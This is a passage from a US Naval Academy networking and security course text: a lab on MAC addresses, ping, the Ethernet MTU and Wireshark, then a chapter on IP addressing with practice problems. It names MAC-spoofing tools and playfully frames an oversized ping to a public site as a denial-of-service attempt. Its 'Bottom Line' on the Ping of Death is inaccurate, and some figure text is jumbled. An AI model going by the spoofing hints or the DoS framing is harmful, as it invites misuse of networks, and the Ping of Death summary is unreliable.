the NIC controls access between the computer and the networking media, its address is also termed a Media Access Control
(MAC) address. Since most NICs conform to the Ethernet standard, the NIC address is also called an Ethernet address. Thus,
the NIC address goes by four different names which are often used interchangeably:

Physical Address

Hardware Address

MAC Address

Ethernet address
In Windows, open a command prompt. (To open a command click the Start button and in the search box type cmd and press
Enter).
At the command prompt, type: getmac /v
Question 1.
Ignoring VMware virtual adapters, and Wi-Fi, what is your computers' Ethernet address?
Recall that a MAC address is 48-bits. The first 3 bytes provide the address of the NIC manufacturer (or vendor). The Institute
of Electrical and Electronics Engineers (IEEE) assigns blocks of addresses to various manufacturers. For a listing of vendor
codes, see
http://standards.ieee.org/develop/regauth/oui/oui.txt
Question 2.
What vendor manufactured your Ethernet card?
Question 3.
Ward Hall has a policy that midshipmen can only connect their original issued computers to the
USNA network. Suppose you go to Best Buy, but a new computer and connect it to the network.
Will Ward Hall be able to tell? If so, how?
Can you "spoof" your MAC address—i.e., have your computer tell the rest of the world your MAC address is different from
the actual value burned into ROM? The answer is: Yes, it is very easy to spoof your MAC address—it requires a change to one
line of the easy-to-edit Windows registry. However, you should not do this since even a small screw-up while editing the
Windows registry can irreparably damage your computer. Bottom line, unless you are a CS major with a 4.0 QPR and ten
computers (so you have a few to spare), you should never edit the Windows registry.
But, can't I download freeware (for example, Technitium) or buy
inexpensive products (like SMAC) that will correctly do this registry
change for me? And, oh, by the way: Who am I?
You can do this, but the ITSD User Agreement that you
have signed in blood forbids it. So, if you download this
software you will be fried. Don't do it!
That wouldn't have stopped me!
Don't listen to him midshipman! Times have changed since 1958!
You will be fried! DON'T DO IT!!!
Chicken!
283
Part 2. Using ping to Determine the Largest Possible Ethernet Frame Size
ping is a tool that can be used to determine whether our computer can reach another computer across the Internet. From the
Windows command prompt, type
ping www.cnn.com
You should see something similar to:
C:> ping www.espn.com
Pinging www.espn.com [199.181.132.250] with 32
Reply from 199.181.132.250: bytes=32 time=74ms
Reply from 199.181.132.250: bytes=32 time=84ms
Reply from 199.181.132.250: bytes=32 time=76ms
Reply from 199.181.132.250: bytes=32 time=75ms
bytes of data:
TTL=233
TTL=233
TTL=233
TTL=233
Ping statistics for 199.181.132.250:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 74ms, Maximum = 84ms, Average = 77ms
ping is a probing tool that sends a packet from our computer to the designated target computer (in this case, the computer
with the name www.espn.com) and waits for a reply. The output above tells us several things:
 our ping packet contains 32 bytes of data (it also happens to contain another 28 bytes of header information).
 we conducted a total of 4 probes.
 we received replies to all four of our probes.
 the round trip time for our four probes were 74, 84, 76 and 75 milliseconds.
Looking at the ping reply above, notice that www.espn.com is also referred to as “199.181.132.250.” This latter sequence
of four numbers (separated by decimals) is, as you might already know, the computer’s IP address. Thus, the computer named
www.espn.com has IP address 199.181.132.250. We will discuss IP addresses in the next lecture.
When we use the ping command, we, by default, ping the target host with 32 bytes of data. We can change the size of the ping
packet by using the –l option. For example, if I type
ping
-l
100
www.cnn.com
I will see something along these lines (but note that IP addresses can and do vary over time):
Pinging www.espn.com [199.181.132.250] with 100
Reply from 199.181.132.250: bytes=100 time=75ms
Reply from 199.181.132.250: bytes=100 time=75ms
Reply from 199.181.132.250: bytes=100 time=74ms
Reply from 199.181.132.250: bytes=100 time=74ms
bytes of data:
TTL=233
TTL=233
TTL=233
TTL=233
Ping statistics for 199.181.132.250:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 74ms, Maximum = 75ms, Average = 74ms
Notice that I pinged www.espn.com with 100 bytes of data. If I had typed
ping -l 150 www. cnn.com
I would have pinged with 150 bytes of data.
Hmmm... I wonder what would happen if I tried to ping www.espn.com with a very large packet. This would mean that the
computer would have to stop for a long time and deal with my request. So, the services of www.espn.com would be then
be denied to others. I might just call this an attack...hmmm...a denial of service attack ...yea, that’s the ticket. I try to ping
with a 50,000 bytes by typing:
ping
-l
50000
www.cnn.com
and I see:
Pinging www.espn.com [199.181.132.250] with 50000 bytes of data:
Request timed out.
Request timed out.
284
Request timed out.
Request timed out.
Ping statistics for 199.181.132.250:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Gasp! My plans for world domination are foiled! The target rejected my ping packets!
Why? Well, Ethernet, which is the local area network technology used by just about everyone (including us!) will only allow
the data packet to be at most a certain size. This maximum size is called the Maximum Transfer Unit (MTU). Well…what if
we want to send a block of data bigger than Ethernet’s MTU? In general, there is no problem with this; the large block of data
is broken (i.e., fragmented) into pieces (each of which is less than or equal to Ethernet’s MTU), and these pieces are then sent
individually. The pieces (fragments) are then put back together when they all arrive at the destination.
In general, there is no hitch, except for one wrinkle: hosts will often ignore ping packets that were fragmented. Why, you ask?
Well, in the mid 1990’s, it was discovered that if a ping packet was fragmented, it could be forced back together at the
destination in such a way that the final size of the reconstituted packet was larger than the maximum permissible IP packet size,
causing the host’s operating system to crash. This scenario was given the somewhat unpleasant name: The Ping of Death.
The Bottom Line: You can crash someone's computer if you send them a ping that is so large that it cannot fit in one Ethernet
frame, i.e., you can crash someone's computer if you send them a ping that exceeds Ethernet's MTU. Most operating systems
are on to this behavior, and will not permit reception of a fragmented ping.
In summary, if you send a very large ping packet, it will need to be fragmented to fit inside Ethernet’s MTU, but these fragments
will then be ignored by the destination since there is no good reason someone should want to send me a ping packet that was
so big that it had to be fragmented.
What is Ethernet’s Maximum Transfer Unit?
What is the largest block of data that Ethernet will allow me to send without requiring fragmentation? To see, we can use the
–f option in the ping command. This option will mean that the packet will not be fragmented, so, if the packet is bigger than
Ethernet’s MTU, it won’t be sent. For example, if I type
ping
-f
-l
50000
www.cnn.com
I am told that the packet needs to be fragmented, but the packet will not be fragmented because the 'don't fragment' option (f) has been used.
Question 4. What is the Ethernet’s MTU? Note that whatever number seems to work for ping, you must add 28 to it,
since the ping data has 28 bytes of header information tacked onto it.
Question 5. After you have completed Question 4, review the notes where we discussed the maximum size of an
Ethernet frame. Does your answer to Question 4 match what the notes say is the maximum amount of data that can
fit inside the data field of an Ethernet frame?
Part 3. Wireshark
Spurred by the Snowden revelations, The Guardian published an article titled "The NSA is turning the Internet into a total
surveillance system." Others speculate that the NSA may be monitoring essentially all Internet traffic. Concerning the NSA's
surveillance of Internet traffic, security expert Brian Reid opined that "This isn’t a wiretap, it’s a country-tap.”
Our objective today is not to examine why such surveillance is done, but rather to gain a sense of how such surveillance is done.
Toward that end, we will gain basic familiarity with a packet sniffer named Wireshark. A packet sniffer is, in essence, a
wiretap that allows you to monitor the traffic passing a particular point in a computer network. A packet sniffer not only allows
you to analyze or inspect individual packets as binary or hexadecimal symbols, but also attempts, where possible, to convert
binary packets into a human-readable format.
Packet sniffers allow the user to determine who is communicating with whom, and what they are saying, topics of great concern
to network security specialists and the people who keep them busy.
Packet sniffing, as with most things, can be used for good purposes or for malicious purposes. A hacker can certainly use a
packet sniffer to detect who is communicating with whom, and the nature of the communication (so-called metadata). Any
unencrypted content (to include unencrypted passwords) can also be read. The NSA uses packet sniffers to thwart terrorist
plots. In June 2013 General Keith Alexander, the Director of the NSA, testified that the NSA's surveillance programs had
foiled at least 50 terrorist attacks worldwide.
Computer engineers use packet sniffers for good purposes also: A network can be analyzed to determine if there is excessive
congestion, troubleshooting of faults can be facilitated, unauthorized network users can be detected, etc.
285
A. Getting Started
Wireshark is a packet sniffer that will capture packets and display them using a nice Graphical User Interface (GUI). Wireshark
is a passive program; it does not transmit packets onto the network. It merely analyzes what traffic is going past your NIC.
Start up VMware Workstation and power-on your Cyber2 VM. Then launch Wireshark be selecting:
Applications > Internet > Wireshark (as root)
Launch Wireshark.
Under File, Click Open and highlight the file named packets:
And then hit Open
286
Now, after opening the file you should see something much more interesting. (If your display looks slightly different from that
shown on the next page, don’t worry. If it looks radically different, let the instructor know.)
Packet
List
Pane
Packet
Details
Pane
Packet
Bytes
Pane
This shows you all the packets that were in the file that was provided. Three pains...I mean panes...are provided. Referring to
the figure above, we see the

Packet List Pane: This displays a summary of each packet captured. Each line represents a packet. You can see that
the packets are numbered—Number 1, Number 2, etc. (This pane presents so-called metadata. From metadata we
can determine such things as: Who is initiating the communication? Who is the intended recipient? What is the overall
goal of the communication—is it an attempt to access a web site? Is it an attempt to send an email? Is it a file transfer?
By clicking on a packet in this pane, you control what is displayed in the two lower panes. In the figure above, the
first line (Packet 1) is highlighted in green, and the two other panes give details about this packet.

Packet Details Pane: Displays more details about the packet that you highlighted in the Packet List Pane.

Packet Bytes Pane: Displays gory details about the packet selected in the Packet List Pane, and highlights the field
selected on the Packet Details Pane. Whereas the top pane reveals the metadata, this pane reveals all of the contents.
Take a moment to memorize the names of these three panes, so that when you see, for instance, “Packet Details Pane” you
don’t have to think: Which one was that again?
Okay, let’s look at the Packet List Pane (which one was that again?).
At the top of the Packets List Pane, starting at the left, we have number (No) column. As mentioned, each packet that was
captured is sequentially numbered by Wireshark.
Question 6. How many packets were captured?
Next over, we have the Time column. By default, this column indicates the relative time that each packet was received, with
the first packet arriving at t = 0.
Question 7. What is the number of the packet that was received 10 seconds into this trace?
Let’s look at packet 5182. Look at the Packet Details pane for this packet:
287
This shows the protocols used by this packet. So, for instance, we see that this packet used Ethernet, The Internet Protocol (IP)
and the Transmission Control Protocol (TCP). By clicking on the plus sign we can expand and collapse each of the listed
protocols.
The bottom pane, the Packet Byte pane, shows the data in the selected packet (in this case, packet 5182) in hexadecimal.
Now, let’s look at the Ethernet protocol in more detail. Click the arrow next to Ethernet and you should see this:
Question 8.
Look at the first 12 hexadecimal numbers in the Packet Bytes Pane. It reads:
00 01 02 c6 3b 6a
This is the very start of the Ethernet frame. Referring to the Ethernet frame format from your notes,
what is the meaning of these 12 hexadecimal numbers?
Question 9.
Look at the next 12 hexadecimal numbers in the Packet Bytes Pane. It reads:
00 04 80 74 09 00
This is the next part of the Ethernet frame. Referring to the Ethernet frame format from your notes,
what is the meaning of these 12 hexadecimal numbers?
Question 10.
Do your answers for Questions 8 and 9 match the info provided in the middle pane?
Question 11.
Can Wireshark be used to determine the NIC card numbers of people using the network?
Question 12.
Look at the next four hexadecimal numbers in the Packet Bytes Pane. It reads:
08 00
Referring to the Ethernet frame format from your notes, what is the meaning of these 4 hexadecimal
numbers?
Question 13.
Go to the website: http://www.cavebear.com/archive/cavebear/Ethernet/type.html
What type of information is carried in the data field of this Ethernet frame
Look at packet number 2.
Question 14. What destination hardware address was used in this frame? What is the meaning of that value for the
destination address?
288
Security Exercise 12 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
289
Question 13:
Question 14:
290
Chapter 13: Internet Protocol
Objectives:
(a) Summarize the principles behind the design of the Internet Protocol.
(b) Define the structure of an IP address and define the purpose of network masking.
(c) Determine the address space available given an IP address and mask.
(d) Identify and explain the basic fields of the IP header.
(e) Understand the current use of the IP address space.
I. The Problem and the Solution
1. The Problem. As computer networking took off in the 1970's, many different competing companies developed many
different network architectures, each using different protocols at each layer. Each company advertised its own approach as
"the best." This explosion of different approaches was beneficial in that it fostered competition, with each company vying to
make their own network architecture better. But, all the while, this presented a problem when people on different networks
wanted to connect to each other.
Originally, computers could only talk to other computers on the same network—but, at the same time, there was a strong desire
to allow any two computers on any two networks to be able to communicate. This seemed infeasible: Different networks have
different frame formats at the data link layer, different physical layer characteristics, different addressing schemes, etc.
Consider the internet shown below, which consists of a token ring (RIP), an Ethernet network and an IBM network (RIP)
connected together. Each of these networks uses different frame formats, as shown. Could we just plop an Ethernet frame on
a token ring network or an SNA network and have it work?
291
Token Frame Format
Data Frame Format
1
1
1
SD
AC
2 or 6
Destination
Address
FC
Starting
delimiter
SD
4
2 or 6
Source
Address
J K 0 J K 0
ED
AC
Information FCS
0
1
ED
1
FS
IBM(line
SNA
J, K non-data symbols
code)
0
Ethernet
Access
control
PPP
Frame
control
FF
T
M
PPP Priority; T Token bit
R
R R Ring M Monitor bit; RRR Reservation
Token
FF
frame type
ZZZZZZ control bit
Z Z Z Z Z Z
High-Level Data Link Control
Ending
delimiter
Figure 13.4 802.3 MAC frame
Frame
status
J K 1 J K 1
A
Copyright ©2000 The McGraw Hill Companies
C
xx
A
I
C
I
E
E
x x
intermediate-frame bit
error-detection bit
A address-recognized bit
xx undefined
C frame-copied bit
Leon-Garcia & Widjaja: Communication Networks
Figure 6.61
The answer is, of course: No. The frame formats on one network will be completely unrecognizable on a different network!
For example, with Ethernet, the destination address occurs starting on the 9 th byte
into
the frame.
In tokenprotocols.
ring, the destination
Frame
format
for bit-oriented
th
nd
address
starts
with
the
4
byte
into
the
frame.
In
SNA,
the
destination
address
occurs
on
the
2
byte
into
the frame.
13.7
As another example, in Ethernet the data starts 23 bytes into the frame, in token ring the data starts either 7 or 15 bytes into the
frame, and for SNA the data starts 3 bytes into the frame. A frame from one network will look like garbage on a different
network.
Note that, aside from the frame format, different networks have “structural” differences also. For example, Ethernet has a
maximum frame size of 1500 bytes, token ring has a maximum frame size of 5000 bytes and SNA has no maximum frame size.
Consider also: Ethernet addresses are always 6 bytes. Token ring addresses can be 2 or 6 bytes, and SNA addresses are 1 byte.
And, furthermore, we’ve shown only three networks connected above. Throw in an ATM network, a Token Bus network,
some Novell and AppleTalk crap, an FDDI optical network and a couple of wireless LANs and things go to hell in a handbasket.
To summarize, then, we need protocols that can implement internetworking, i.e., we need protocols that can overcome the
differences in networks. These protocols should "conceal" the underlying network differences so that users are unaware that
different networks even exist. From the user's perspective, everyone should be on one monolithic network.
2. The Solution: The Kahn/Cerf Protocols
A revolutionary solution to the internetworking problem was proposed in the early 70's by Vinton Cerf and Robert Kahn. The
two protocols they proposed, later christened the Internet Protocol (IP) and the Transmission Control Protocol (TCP) quickly
became the most popular suite of protocols for internetworking and were subsequently adopted as the protocols used by the
Internet.
292
Vinton Cerf
Robert Kahn
Cerf and Kahn with President Bush
If the award of the Presidential Medal of Freedom does not convince you of the importance of these protocols, perhaps this
will: These protocols are so damn famous that one of the authors was once invited to give a talk to fascinated midshipmen:
These two protocols—IP and TCP—are truly a work of genius. These protocols were intended to allow internetworking for
small networks (in 1975 the Internet had a mere 61 nodes). These protocols have successfully scaled to support networks of
billions of users. It is estimated that two billion videos are watched on YouTube each day. Trillions of emails are sent each
year. Think about all the things you use the Internet for—and then think that it all works because of protocols that were
designed in 1975 for a small system, and never intended to scale to large networks.
Stated another way: It is amazing that the Internet actually works at all!
However, the fact that the Internet uses protocols originally designed to be used on a small network of academics means that
security was never baked into the cake. Security was not needed on a network of 61 nodes, all of whom were friends. With
one billion nodes on the network today, well… things are different.
3. The Premises. Kahn and Cerf reasoned that for internetworking to be efficient, everyone must agree on three things:



A standard for service
A global addressing scheme
A uniform packet format
Regarding the first item above—the standard for service—IP provides connectionless unreliable best-effort packet delivery.
 Connectionless: Every packet is an independent entity, possibly traveling over different paths from source to
destination. Stated another way, there is no network connection that is set up in advance along which all packets will
subsequently flow from source to destination.
 Unreliable: Packets can be lost, delivered out of order, or delivered multiple times; IP will not detect this.
 Best-effort: There are no guarantees packet delivery will be successful. Basically, IP says: "I'll try, but no guarantees."
The standard of service provided by IP can be likened to the Post Office. To see this, suppose that you mail three letters to
your family back in Los Angeles, California. Each letter is mailed from the same location in Bancroft Hall. You mail Letter
#1 on Monday, Letter #2 on Tuesday and Letter #3 on Wednesday.
It is quite possible that the letters follow different routes from Annapolis to Los Angeles. For instance, two of the letters might
be delivered on a direct flight, while the third might be placed in a bag that has to change planes in Chicago. Letter delivery is
connectionless.
It is quite possible that your family receives the letters out of order, perhaps receiving Letter 3 before Letter 2. One of your
letters might never be delivered—the Post Office estimates that slightly over 1% of mail is never delivered to the destination
(for varying reasons). Letter delivery is unreliable.
Unless you pay a premium, there are no guarantees that a letter you place in the mail will actually be delivered. Letter delivery
is provided on a best-effort basis.
We now address the other two requirements for internetworking. The global addressing scheme will be discussed in Section
II below, and the uniform packet format will be discussed in Section III.
II. The IP Address
1. A Software Address: To make a group of networks "appear" to be a single network, we must use a single global addressing
scheme for all hosts on all networks. IP assigns to each computer a unique 32-bit IP address.
293
This is a "software address"; it is not a hardware address. To send a packet over a TCP/IP network, we must use the
destination's IP address.
IP addresses have two parts: a Network ID, which is the same for all hosts on particular network, and Host ID, which is a
unique suffix for each individual host on this particular network.
Network ID
Host ID
Same for all computers
on a particular network
Unique suffix for each individual computer
on this particular network
2. Dotted Decimal Notation for Reading IP addresses. Let's momentarily gloss over the separation of the IP address into a
Network ID and a Host ID, and simply focus on how the 32-bit address is represented. For historical reasons, IP addresses are
expressed as decimal numbers (as opposed to a more sensible hexadecimal scheme).
The 32-bit IP address is separated into four 8-bit chunks (octets). Each octet is then expressed as a decimal value, separated
by periods. This is termed the dotted-decimal notation for IP addresses.
For example, to express the IP address 10000001000010010100000111001111 in dotted decimal notation, it is first
split into four octets:
10000001
00001001
01000001
11001111
and the four octets are each individually converted to a decimal (base-10) number:
10000001
00001001
129
01000001
9
65
11001111
207
We then write the four decimal numbers separated by periods: the IP address is 129.9.65.207.
Practice Problem 13.1
Express each of the following IP addresses in dotted-decimal notation.
(a)
00001011
00000010
00000000
00100111
(b)
10000000
10000000
11111111
00000000
Solution:
(a)
(b)
Every computer on the Internet must have a unique IP address. That is, no two devices on the Internet can have the same IP
address at the same time. In theory, since IP addresses are 32 bits, we have 2 32 (more than 4 billion) IP addresses available.
Thus, in theory, more than 4 billion devices could be simultaneously connected to the Internet.
3. The Network Mask Now, let's revisit the notion that the 32 bits in an IP address are divided into a Network ID and a Host
ID. To view the Network ID portion of an IP address, we use a network mask. A network mask (which we will just call a
mask, since the context is understood) is a 32-bit number consisting of a string of contiguous 1’s followed by contiguous 0’s.
Practice Problem 13.2
Which of the following can serve as masks?
(a)
(b)
(c)
(d)
255.2.0.0
255.255.0.0
255.255.0.23
255.255.64.0
Solution: (a)
(b)
(c)
(d)
294
Practice Problem 13.3
Show that the address 255.240.0.0 is a mask by writing out the address as 32 bits.
Solution:
Since masks always have the same form (a string of ones followed by a string of zeroes), they lend themselves to an easy
shorthand notation. We can write a mask as /n where n is the number of ones. This is called “slash notation” or CIDR notation.
The acronym CIDR stands for Classless Inter-Domain Routing.23
Practice Problem 13.4
Write the following masks in slash notation.
(a) 255.0.0.0
(b) 255.255.255.0
(c) 255.240.0.0
Solution: (a)
(b)
(c)
Practice Problem 13.5
Write the following masks in dotted decimal notation.
(a) /16
(b) /9
Solution: (a)
(b)
4. Use of Masks
Recall that IP addresses have two parts.
Network ID
Host ID
We design masks so that if we bitwise AND the mask with an IP address, we extract the network ID.
For example, suppose we are examining a Navy site that is using a mask of /17. Suppose we see that a host on this network
has the IP address: 131.122.220.30. What is the network ID?
To solve this problem, we first express the mask as a 32-bit IP address:
1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0
We then express the IP address as a 32-bit quantity:
1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 1 0 1 1 1 0 0 . 0 0 0 1 1 1 1 0
We then bitwise AND the mask with the IP address. Recall the table for the bitwise AND operation:
A
0
0
1
1
mask
B
0
1
0
1
A AND B
0
0
0
1
1 1 1 1 1 1 1 1 . 1 1 1 1 1 1 1 1 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0
IP add
1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 1 0 1 1 1 0 0 . 0 0 0 1 1 1 1 0
- - - - - - - - - - - - - - - . - - - - - - - - . - - - - - - - Net add 1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 0 0 0 0 0 0 0 . 0 0 0 0 0 0 0 0
23
This is pronounced "cider", like "apple cider".
295
Now, converting the result to dotted decimal notation, we have the network ID: 131.122.128.0
Recall the significance of this network address and the mask: Since the mask was given as /17, every host on this network will
have the same first 17 bits in common. The network ID—131.122.128.0—specifies the exact values of these first 17 bits.
Thus, every host on this network has an IP address that begins:
1 0 0 0 0 0 1 1 . 0 1 1 1 1 0 1 0 . 1 ...
The remaining bits (shown as the three dots above) are used to constitute the host ID.
Practice Problem 13.6
Suppose an organization has been given a mask /24. One of its machines has IP address 200.137.34.56. What is the
network ID?
Solution:
Practice Problem 13.7
Suppose an organization has been given a mask /13. One of its machines has IP address 200.137.34.56. What is the
network ID?
Solution:
5. Obtaining an IP Address Each host on the Internet must have a unique IP address. It would be very bad for two (or
more) people to have the same IP address. This latter (bad) event is termed an address conflict. So, we must ensure there are
no address conflicts.
When an organization needs IP addresses, it is given a block of addresses. So… how does an organization get a block of IP
addresses to dole out to its hosts?
To ensure there are no address conflicts, (i.e., to ensure uniqueness) an organization—the Internet Assigned Numbers Authority
(IANA)—gives out network addresses. IANA has authorized five sub-organizations, termed Regional Address Registries,
to control large blocks of addresses and distribute them to organizations in different geographic regions of the world. The
Regional Address Registry covering the United States and Canada is ARIN (which stands for American Registry for Internet
Numbers).
Generally, ordinary organizations do not interact with ARIN. Usually, ISPs get a large number of addresses from ARIN, and
organizations, in turn, get blocks of addresses from their ISP. So, the authority is:
296
ICANN
IANA
Ultimately controls
all IP addresses
address
5 Regional5Address
Registries
Registries
that
that ICANN
IANA
has
has authorized
to administer
authorized
to
blocks of
administer
blocks
addresses
of addresses
RIPE
APNIC
ISP 1
ARIN
ISP 2
Joe’s
Hardware
…
Sal’s Pizza
LATNIC
ISP 16
…
…
USNA
AFRINIC
…
Figure 2. Internet authority hierarchy (RIPE = Réseaux IP Européens)
So…bottom line…when an organization needs IP addresses, it is given a network address (usually from an ISP). The
organization then uses the remaining bits in the IP address (corresponding to the host bits) to distribute unique IP addresses to
its hosts.
An
Aside
Believe it or not, from the inception of the Internet until late 1998, a single individual
manually assigned all IP addresses. The individual, Jon Postel, was termed by many as the
God of the Internet. He formed the Internet Assigned Numbers Authority (see picture
above) and served as its head until his death at age 55. He was the guiding force behind a
number of Internet protocols.
On the ten-year anniversary of his passing, Vint Cerf offered the toast: “Here's to Jonathan
B. Postel, a man who went about his work diligently and humbly, who served all who wished
to partake of the Internet and to contribute to it, and who did so asking nothing in return but
the satisfaction of a job well done and a world open to new ideas.”
6. IP Address Blocks
When an organization is given a network ID, it is given an IP address and a mask. For example, an organization might be given
the block of IP addresses:
205.16.37.32/28
In this case, the first 28 bits determine the Network ID, and the final 4 bits are used for the Host ID. Thus, all hosts on this
network will have the first 28 bits in common:
205.16.37. 0 0 1 0 _ _ _ _
All hosts on this network will have the
same first 28 bits—the Network ID.
The organization can play with the
last four bits to dole out unique IP
addresses to all of its hosts.
So, the organization can choose to make the host ID 0001, or 0101, or 1011, etc. It can use the last four bits to assign unique
IP address to all of its hosts. The organization has 24 = 16 different ways it can assign these last four bits.
297
From Forouzan, Data Communications and Networking, 2007
Any host on this network can have its address represented in CIDR notation by following the address with the mask. For
example, an individual host on the above network might have its IP address expressed as
205.16.37.39/28
More generally, a block of IP addresses is defined using the notation
W.X.Y.Z/n
where W.X.Y.Z defines any address in the block and /n defines the mask, i.e. the n leftmost bits are 1.
19.19
Practice Problem 13.8
You know that one of your organization’s IP addresses is 205.16.37.39 / 28.
(a)
Describe the mask qualitatively.
Solution:
(b)
What is the mask in binary?
Solution:
(c)
What is the mask in dotted decimal notation?
Solution:
(d)
Now, the mask bits with a 1 correspond to the “network-ID” and the mask bits with a zero correspond to the bits that
you can play with to assign IP addresses to your hosts. If that is the case, how many addresses have you been given?
Solution:
Now, we have to further complicate matters.
First complication: The first address in a block is termed the network address, and is normally not assigned to a host. That is,
the first address in your block, where the host bits all have a value of zero, is used to define your network to the rest of the
world. In the foregoing example, we said that “we will have to revise this answer shortly.” Here is the revision: We have 16
addresses, but the first is our network address, which is not available to assign to a host.
Second complication: The last address in a block is termed the broadcast address, and is normally not assigned to a host. That
is, the last address in your block, where the host bits all have a value of one, is used to indicate "all hosts on this network", and
this address is thus not available to assign to a host.
Bottom line: When you calculate the number of IP addresses you have to play with, you first determine the number of bits in
the host-ID portion, and then use the formula:
Number of addresses available for assignment to hosts =
2number of bits in the host-ID portion  2
Practice Problem 13.9
298
You own a small organization that needs (and is given) 14 IP addresses for assignment to individual hosts. What is your mask
in dotted decimal notation?
Solution:
Practice Problem 13.10
As in the example above, you know that one of your organization’s IP addresses is 205.16.37.39 / 28. What is the network
address assigned to your organization?
Solution:
Last byte: MASK:
Address:
Result:
This is a major point of confusion for students. If I know that one of my machines has an IP address of
205.16.37.39
how can I tell that the network address I own is
205.16.37.32
The answer: by using the mask as we have shown.
Practice Problem 13.11
What is the network address of a network that has a host assigned the IP address:
Solution:
Practice Problem 13.12
299
182.44.82.16 / 26
What is the network address of a network that has a host assigned the IP address:
Solution:
182.44.82.80 / 26
So, as you can see, there is the potential for things to get very tricky here. If you knew a host had IP address 182.44.82.80 is
it obvious that the host is on a network with network address 182.44.82.64?
Here is an alternate way to find the network address (i.e., the first address in your block):
If the IP address of a host is W.X.Y.Z/n set the 32

n rightmost bits to zero.
Practice Problem 13.13
Using the technique above, determine the network address of a network that has a host assigned the IP address: 182.44.82.16 /
26
Solution:
Practice Problem 13.14
Using the technique above, determine the network address of a network that has a host assigned the IP address: 182.44.82.80 /
26.
Solution:
Practice Problem 13.15
Suppose one of your machines has the IP address 180.34.64.65 / 30.
(a) How many addresses do you have available for assignment to hosts?
(b) What is your network address?
Solution:
(a)
(b)
So much for the first address in your block. How do you find the last address (i.e., the broadcast address) in your block?
300
Here is a way to find the last address in your block:
If the IP address of a host is W.X.Y.Z/n set the 32
 n rightmost bits to one.
Practice Problem 13.16
Suppose you know that one of your organization’s IP addresses is 205.16.37.39/28. What is the last address (the broadcast
address) in the block assigned to your organization?
Solution:
Summary of what you need to know: Given that you have a host with address W.X.Y.Z / n determine the number of
addresses you have in your block, as well as the first address (i.e., the network address) and last address (i.e., the broadcast
address).
IP
IPAddresses
Addresses(2)(2)
7. Special IP Addresses.
We already mentioned that an IP address with the network ID bits are set to the proper value, but the host bits are all zero refers
to the network itself.
Similarly, IP address with the network ID bits set to the proper value but with the host bits all set to one is the broadcast address
for that network.
Here are more special IP addresses.

The all-zeroes address (32 zeroes) means: “me”. This address is used by a host that does not know its IP address.

The all ones address (32 ones): all hosts on this network
Why would this ever be used? A host may not know its own IP address (and hence does not know its network ID).
A host that just starts up and doesn't know who or where it is uses the all zeroes address to refer to itself and the all ones address
to refer to "anyone else out there."

The reserved address 127.0.0.0 is used for “loopback.” This address is used for testing on the local computer. When
127.0.0.0 is used as a destination address, the computer does not send the packet to the network.
8. Private IP Addresses
IANA has reserved the following IP addresses for private use:
10.0.0.0
172.16.0.0
192.168.0.0
Range
to
to
to
10.255.255.255
172.31.255.255
192.168.255.255
Special IP addresses.
Special IP addresses.
5 Network
You are 3/24/2007
allowed to use any of these addresses atTanenbaum
will withoutChapter
permission
from anyone. Note that this equates to almost71
18
million addresses (almost ½ of 1% of the potential IP addresses). Private IP addresses cannot be used in the Internet, routers
will not forward them. These addresses must be unique within a private network, but do not need to be unique globally.
3/24/2007
Tanenbaum Chapter 5 Network
Practice Problem 13.17
(a) Can more than one organization assign the number 172.18.3.1 to one of its machines?
301
71
(b) If no, why not? If yes, does this violate the cardinal rule: No two machines on the Internet can have the same IP address
at the same time?
(c) What happens if I try to launch a packet with the destination address 172.18.3.1 onto the Internet?
Solution:
(a)
(b)
(c)
III. The Uniform Packet Format
We mentioned that IP was developed with the idea that to internetwork efficiently, we must have an agreed upon packet format.
The Internet Protocol defines a hardware-independent packet format. The IP packet has the basic structure:
Header
Data
The size of the
header can
vary datagram
from 20 to 60 bytes.
The maximum allowed total size of an IP packet (header + data) is: 64
Figure
20.5
IPv4
format
KB = 65,535 bytes.
The IP packet format:
Forouzan, Data Communications and Networking, McGraw Hill, 2007
We offer a brief explanation for the various fields:
 Version: Current version IP version 4
 HLEN: length of the header (in 4 byte increments): Minimum: 5, Maximum 15 (Note: In practice, the vast majority
of IP packets contain no options and thus have the minimum header length of 5.)
 Type of service: This isn’t used much in practice. We'll ignore it.
 Total length: Total number of bytes in the packet (header plus data). Max is 65,535.
 Flags and fragmentation offset: These fields will not be covered in this class.
 Time to live: This eight-bit field serves as a hop-counter. The originating source of the IP packet places a number in
this field (and since the field is eight bits, the maximum number that can be placed in this field is 255). The value
stored in the time-to-live field is then decremented by one by each router that encounters the packet. When the time-
20.11
302




to-live (hop-counter) reaches zero, the packet is discarded. This purpose of this field is to prevent a packet from
wandering around the Internet aimlessly forever.
Protocol: TCP or UDP or other?
Header checksum: A checksum of the header only.
Addresses. If you don't know what these are, you've been asleep for the past hour!
Options: These options will not be covered in this class.
303
304
Problems
1.
2.
Suppose you transfer a computer from the ECE Department at USNA to the EECS Department at USMA. Will its MAC
address need to be changed? Will its IP address need to be changed?
(a)
(b)
(c)
(d)
(e)
(f)
3.
(a)
(b)
(c)
(d)
(e)
(f)
4.
(a)
5.
What is the network address of 10.64.128.200 /28?
How many IP addresses are there in the block of IP addresses assigned to this network?
What is the first available IP address that can be assigned to a host?
What is the last available IP address that can be assigned to a host?
What is the broadcast address for this network?
Can the IP addresses assigned to this network be routed across the Internet? Justify your answer.
Write the following masks in slash notation.
(i)
255.255.255.0
(ii)
255.240.0.0
(b)
Write the following masks in dotted decimal notation.
(i)
/16
(ii)
/9
The purpose of the header checksum field in an IP header is to (choose the correct answer):
(a)
(b)
(c)
(d)
6.
Assume an IP packet traverses multiple routers on its way from source to destination. Which IP packet header
fields change from router to router?
You receive an IP datagram containing 1024 bytes (assume no options). What is the value of the HLEN and
TOTAL LENGTH fields?
What is the purpose of the Time-to-Live field in the IP packet header?
If an IP packet header is 32 bytes total, what value should the HLEN field contain for this packet?
